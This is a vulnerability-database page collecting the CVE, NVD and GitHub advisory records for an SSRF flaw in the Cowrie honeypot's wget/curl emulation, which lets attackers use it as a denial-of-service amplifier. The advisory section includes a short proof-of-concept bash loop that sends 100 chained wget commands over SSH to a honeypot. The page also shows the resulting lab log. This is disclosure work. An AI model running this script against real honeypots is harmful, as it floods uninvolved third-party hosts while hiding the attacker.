Vulnerability-Lookup

CVE-2025-34469 (GCVE-0-2025-34469)

Vulnerability from cvelistv5 – Published: 2025-12-31 21:36 – Updated: 2026-01-02 14:35 X_Known Exploited Vulnerability

Title

Cowrie < 2.9.0 Unrestricted wget/curl Emulation Enables SSRF-Based DDoS Amplification

Summary

Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker’s true source address behind the honeypot’s IP.

Severity ?

6.9 (Medium)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

CWE

CWE-918 - Server-Side Request Forgery (SSRF)

Assigner

VulnCheck

References

URL

Tags

	https://github.com/advisories/GHSA-83jg-m2pm-4jxj	vendor-advisory
	https://github.com/cowrie/cowrie/releases/tag/v2.9.0	release-notespatch
	https://github.com/cowrie/cowrie/pull/2800	patch
	https://github.com/cowrie/cowrie/issues/2622	issue-tracking
	https://www.vulncheck.com/advisories/cowrie-unres…	third-party-advisory

Impacted products

	Vendor	Product	Version
	Cowrie	Cowrie	Affected: 0 , < 2.9.0 (semver)

Credits

Abraham Gebrehiwot and Filippo Lauria (Institute of Informatics and Telematics, Italian National Research Council (CNR))

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-34469",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-01-02T14:18:00.566917Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-01-02T14:35:42.572Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/advisories/GHSA-83jg-m2pm-4jxj"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Cowrie",
          "vendor": "Cowrie",
          "versions": [
            {
              "lessThan": "2.9.0",
              "status": "affected",
              "version": "0",
              "versionType": "semver"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "value": "Abraham Gebrehiwot and Filippo Lauria (Institute of Informatics and Telematics, Italian National Research Council (CNR))"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker\u2019s true source address behind the honeypot\u2019s IP."
            }
          ],
          "value": "Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker\u2019s true source address behind the honeypot\u2019s IP."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "exploitMaturity": "NOT_DEFINED",
            "privilegesRequired": "NONE",
            "providerUrgency": "NOT_DEFINED",
            "subAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "valueDensity": "NOT_DEFINED",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L",
            "version": "4.0",
            "vulnAvailabilityImpact": "LOW",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "NONE",
            "vulnerabilityResponseEffort": "NOT_DEFINED"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-918",
              "description": "CWE-918 Server-Side Request Forgery (SSRF)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-12-31T21:36:19.022Z",
        "orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
        "shortName": "VulnCheck"
      },
      "references": [
        {
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://github.com/advisories/GHSA-83jg-m2pm-4jxj"
        },
        {
          "tags": [
            "release-notes",
            "patch"
          ],
          "url": "https://github.com/cowrie/cowrie/releases/tag/v2.9.0"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://github.com/cowrie/cowrie/pull/2800"
        },
        {
          "tags": [
            "issue-tracking"
          ],
          "url": "https://github.com/cowrie/cowrie/issues/2622"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification"
        }
      ],
      "source": {
        "discovery": "UNKNOWN"
      },
      "tags": [
        "x_known-exploited-vulnerability"
      ],
      "title": "Cowrie \u003c 2.9.0 Unrestricted wget/curl Emulation Enables SSRF-Based DDoS Amplification",
      "x_generator": {
        "engine": "Vulnogram 0.5.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
    "assignerShortName": "VulnCheck",
    "cveId": "CVE-2025-34469",
    "datePublished": "2025-12-31T21:36:19.022Z",
    "dateReserved": "2025-04-15T19:15:22.607Z",
    "dateUpdated": "2026-01-02T14:35:42.572Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-34469\",\"sourceIdentifier\":\"disclosure@vulncheck.com\",\"published\":\"2025-12-31T22:15:49.003\",\"lastModified\":\"2026-01-02T16:45:26.640\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker\u2019s true source address behind the honeypot\u2019s IP.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":6.9,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"NONE\",\"vulnAvailabilityImpact\":\"LOW\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"LOW\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"disclosure@vulncheck.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"references\":[{\"url\":\"https://github.com/advisories/GHSA-83jg-m2pm-4jxj\",\"source\":\"disclosure@vulncheck.com\"},{\"url\":\"https://github.com/cowrie/cowrie/issues/2622\",\"source\":\"disclosure@vulncheck.com\"},{\"url\":\"https://github.com/cowrie/cowrie/pull/2800\",\"source\":\"disclosure@vulncheck.com\"},{\"url\":\"https://github.com/cowrie/cowrie/releases/tag/v2.9.0\",\"source\":\"disclosure@vulncheck.com\"},{\"url\":\"https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification\",\"source\":\"disclosure@vulncheck.com\"},{\"url\":\"https://github.com/advisories/GHSA-83jg-m2pm-4jxj\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-34469\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-01-02T14:18:00.566917Z\"}}}], \"references\": [{\"url\": \"https://github.com/advisories/GHSA-83jg-m2pm-4jxj\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-01-02T14:18:05.064Z\"}}], \"cna\": {\"tags\": [\"x_known-exploited-vulnerability\"], \"title\": \"Cowrie \u003c 2.9.0 Unrestricted wget/curl Emulation Enables SSRF-Based DDoS Amplification\", \"source\": {\"discovery\": \"UNKNOWN\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"value\": \"Abraham Gebrehiwot and Filippo Lauria (Institute of Informatics and Telematics, Italian National Research Council (CNR))\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 6.9, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L\", \"exploitMaturity\": \"NOT_DEFINED\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"LOW\", \"vulnAvailabilityImpact\": \"LOW\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Cowrie\", \"product\": \"Cowrie\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"2.9.0\", \"versionType\": \"semver\"}], \"defaultStatus\": \"unaffected\"}], \"references\": [{\"url\": \"https://github.com/advisories/GHSA-83jg-m2pm-4jxj\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"https://github.com/cowrie/cowrie/releases/tag/v2.9.0\", \"tags\": [\"release-notes\", \"patch\"]}, {\"url\": \"https://github.com/cowrie/cowrie/pull/2800\", \"tags\": [\"patch\"]}, {\"url\": \"https://github.com/cowrie/cowrie/issues/2622\", \"tags\": [\"issue-tracking\"]}, {\"url\": \"https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"Vulnogram 0.5.0\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker\\u2019s true source address behind the honeypot\\u2019s IP.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker\\u2019s true source address behind the honeypot\\u2019s IP.\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918 Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"shortName\": \"VulnCheck\", \"dateUpdated\": \"2025-12-31T21:36:19.022Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2025-34469\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-01-02T14:35:42.572Z\", \"dateReserved\": \"2025-04-15T19:15:22.607Z\", \"assignerOrgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"datePublished\": \"2025-12-31T21:36:19.022Z\", \"assignerShortName\": \"VulnCheck\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2025-34469

Vulnerability from fkie_nvd - Published: 2025-12-31 22:15 - Updated: 2026-01-02 16:45

Severity ?

6.9 (Medium) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

Summary

References

	URL	Tags
	disclosure@vulncheck.com	https://github.com/advisories/GHSA-83jg-m2pm-4jxj
	disclosure@vulncheck.com	https://github.com/cowrie/cowrie/issues/2622
	disclosure@vulncheck.com	https://github.com/cowrie/cowrie/pull/2800
	disclosure@vulncheck.com	https://github.com/cowrie/cowrie/releases/tag/v2.9.0
	disclosure@vulncheck.com	https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/advisories/GHSA-83jg-m2pm-4jxj

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cowrie versions prior to 2.9.0 contain a server-side request forgery (SSRF) vulnerability in the emulated shell implementation of wget and curl. In the default emulated shell configuration, these command emulations perform real outbound HTTP requests to attacker-supplied destinations. Because no outbound request rate limiting was enforced, unauthenticated remote attackers could repeatedly invoke these commands to generate unbounded HTTP traffic toward arbitrary third-party targets, allowing the Cowrie honeypot to be abused as a denial-of-service amplification node and masking the attacker\u2019s true source address behind the honeypot\u2019s IP."
    }
  ],
  "id": "CVE-2025-34469",
  "lastModified": "2026-01-02T16:45:26.640",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 6.9,
          "baseSeverity": "MEDIUM",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "LOW",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "LOW",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "NONE",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "disclosure@vulncheck.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-12-31T22:15:49.003",
  "references": [
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://github.com/advisories/GHSA-83jg-m2pm-4jxj"
    },
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://github.com/cowrie/cowrie/issues/2622"
    },
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://github.com/cowrie/cowrie/pull/2800"
    },
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://github.com/cowrie/cowrie/releases/tag/v2.9.0"
    },
    {
      "source": "disclosure@vulncheck.com",
      "url": "https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/advisories/GHSA-83jg-m2pm-4jxj"
    }
  ],
  "sourceIdentifier": "disclosure@vulncheck.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-918"
        }
      ],
      "source": "disclosure@vulncheck.com",
      "type": "Secondary"
    }
  ]
}

GHSA-83JG-M2PM-4JXJ

Vulnerability from github – Published: 2025-12-20 17:42 – Updated: 2026-01-08 20:51

Summary

Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification

Details

Summary

A Server-Side Request Forgery (SSRF) vulnerability in Cowrie's emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.

Details

When Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The wget and curl command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.

An attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands targeting a victim host. Since there was no rate limiting mechanism in place, the attacker could generate unlimited outbound HTTP traffic toward the victim. The requests originate from the honeypot's IP address, effectively masking the attacker's identity and turning the honeypot into an unwitting participant in distributed denial-of-service (DDoS) attacks.

This vulnerability was observed being actively exploited in the wild.

Acknowledgements This vulnerability was investigated by Abraham Gebrehiwot and Filippo Lauria, with additional contributions from Michele Castellaneta and Claudio Porta. All researchers are affiliated with the Institute of Informatics and Telematics (IIT), Italian National Research Council (CNR).

Fix This issue has been fixed in version 2.9.0 via PR #2800, which introduces a rate limiting mechanism for outbound requests in command emulations such as wget and curl.

PoC

This is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability.

Setup: - Victim machine (192.168.1.30): runs a simple HTTP server - Attacker machine (192.168.1.20): initiates the attack - Cowrie honeypot (192.168.1.10): configured in emulated shell mode with SSH access (credentials: test:test)

On the victim machine, start an HTTP server:

sudo python3 -m http.server 80

On the attacker machine, execute:

PAYLOAD=$(for i in {1..100}; do echo -n 'wget -q http://192.168.1.30;'; done) && \
for i in {1..10}; do sshpass -p test ssh test@192.168.1.10 "$PAYLOAD"; done

This command builds a PAYLOAD consisting of 100 concatenated wget commands, then executes it 10 times via SSH, resulting in 1,000 HTTP requests toward the victim from a single attack script. The amplification factor can be arbitrarily increased by adjusting these values, bounded by technical limitations such as argument length, buffer sizes, etc.

Result: The victim's HTTP server logs show 1,000 requests originating exclusively from the honeypot's IP address (192.168.1.10), received within approximately 5 seconds (truncated for brevity):

192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:03] "GET / HTTP/1.1" 200 -
...
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -
192.168.1.10 - - [11/Dec/2025 14:33:08] "GET / HTTP/1.1" 200 -

Notice that the attacker's IP (192.168.1.20) never appears in the victim's logs, demonstrating how the honeypot masks the attacker's identity.

Impact

This is a Server-Side Request Forgery (SSRF) vulnerability that enables abuse of Cowrie honeypots as DDoS amplification nodes.

Who is impacted: Any organization running Cowrie in emulated shell mode (the default configuration) with versions prior to 2.9.0.

Consequences: - Third-party victims receive unwanted HTTP traffic from the honeypot's IP address - Attackers can mask their identity behind the honeypot's IP - Honeypot operators may face abuse complaints or have their infrastructure blocklisted - Network resources of the honeypot host are consumed

Severity ?

8.3 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L

6.9 (Medium)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "cowrie"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-34469"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-12-20T17:42:07Z",
    "nvd_published_at": "2025-12-31T22:15:49Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA Server-Side Request Forgery (SSRF) vulnerability in Cowrie\u0027s emulated shell mode allows unauthenticated attackers to abuse the honeypot as an amplification vector for HTTP-based denial-of-service attacks against arbitrary third-party hosts.\n\n### Details\n\nWhen Cowrie operates in emulated shell mode (the default configuration), it basically emulates common Linux commands. The `wget` and `curl` command emulations actually perform real outbound HTTP requests to the destinations specified by the attacker, as this functionality is intended to allow Cowrie to save downloaded files for later inspection.\n\nAn attacker who connects to the honeypot via SSH or Telnet can repeatedly invoke these commands targeting a victim host. Since there was no rate limiting mechanism in place, the attacker could generate unlimited outbound HTTP traffic toward the victim. The requests originate from the honeypot\u0027s IP address, effectively masking the attacker\u0027s identity and turning the honeypot into an unwitting participant in distributed denial-of-service (DDoS) attacks.\n\nThis vulnerability was observed being actively exploited in the wild.\n\n**Acknowledgements**\nThis vulnerability was investigated by _[Abraham Gebrehiwot](https://www.iit.cnr.it/en/abraham.gebrehiwot/)_ and _Filippo Lauria_, with additional contributions from _Michele Castellaneta_ and _Claudio Porta_. All researchers are affiliated with the [Institute of Informatics and Telematics](https://www.iit.cnr.it/en/) (IIT),  [Italian National Research Council](https://www.cnr.it/en/) (CNR).\n\n**Fix**\nThis issue has been fixed in version 2.9.0 via PR #2800, which introduces a rate limiting mechanism for outbound requests in command emulations such as `wget` and `curl`.\n\n### PoC\n\nThis is a rudimentary proof of concept demonstrating the amplification potential of this vulnerability.\n\n**Setup:**\n- Victim machine (192.168.1.30): runs a simple HTTP server\n- Attacker machine (192.168.1.20): initiates the attack\n- Cowrie honeypot (192.168.1.10): configured in emulated shell mode with SSH access (credentials: `test:test`)\n\n**On the victim machine**, start an HTTP server:\n```bash\nsudo python3 -m http.server 80\n```\n\n**On the attacker machine**, execute:\n```bash\nPAYLOAD=$(for i in {1..100}; do echo -n \u0027wget -q http://192.168.1.30;\u0027; done) \u0026\u0026 \\\nfor i in {1..10}; do sshpass -p test ssh test@192.168.1.10 \"$PAYLOAD\"; done\n```\n\nThis command builds a `PAYLOAD` consisting of 100 concatenated `wget` commands, then executes it 10 times via SSH, resulting in 1,000 HTTP requests toward the victim from a single attack script. The amplification factor can be arbitrarily increased by adjusting these values, bounded by technical limitations such as argument length, buffer sizes, etc.\n\n**Result:** The victim\u0027s HTTP server logs show 1,000 requests originating exclusively from the honeypot\u0027s IP address (192.168.1.10), received within approximately 5 seconds (truncated for brevity):\n```\n192.168.1.10 - - [11/Dec/2025 14:33:03] \"GET / HTTP/1.1\" 200 -\n192.168.1.10 - - [11/Dec/2025 14:33:03] \"GET / HTTP/1.1\" 200 -\n192.168.1.10 - - [11/Dec/2025 14:33:03] \"GET / HTTP/1.1\" 200 -\n...\n192.168.1.10 - - [11/Dec/2025 14:33:08] \"GET / HTTP/1.1\" 200 -\n192.168.1.10 - - [11/Dec/2025 14:33:08] \"GET / HTTP/1.1\" 200 -\n192.168.1.10 - - [11/Dec/2025 14:33:08] \"GET / HTTP/1.1\" 200 -\n```\n\nNotice that the attacker\u0027s IP (192.168.1.20) never appears in the victim\u0027s logs, demonstrating how the honeypot masks the attacker\u0027s identity.\n\n### Impact\n\nThis is a Server-Side Request Forgery (SSRF) vulnerability that enables abuse of Cowrie honeypots as DDoS amplification nodes.\n\n**Who is impacted:** Any organization running Cowrie in emulated shell mode (the default configuration) with versions prior to 2.9.0.\n\n**Consequences:**\n- Third-party victims receive unwanted HTTP traffic from the honeypot\u0027s IP address\n- Attackers can mask their identity behind the honeypot\u0027s IP\n- Honeypot operators may face abuse complaints or have their infrastructure blocklisted\n- Network resources of the honeypot host are consumed",
  "id": "GHSA-83jg-m2pm-4jxj",
  "modified": "2026-01-08T20:51:42Z",
  "published": "2025-12-20T17:42:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cowrie/cowrie/security/advisories/GHSA-83jg-m2pm-4jxj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34469"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cowrie/cowrie/issues/2622"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cowrie/cowrie/pull/2800"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cowrie/cowrie"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cowrie/cowrie/releases/tag/v2.9.0"
    },
    {
      "type": "WEB",
      "url": "https://www.cve.org/cverecord?id=CVE-2025-34469"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/cowrie-unrestricted-wget-curl-emulation-enables-ssrf-based-ddos-amplification"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Cowrie has a SSRF vulnerability in wget/curl emulation enabling DDoS amplification"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
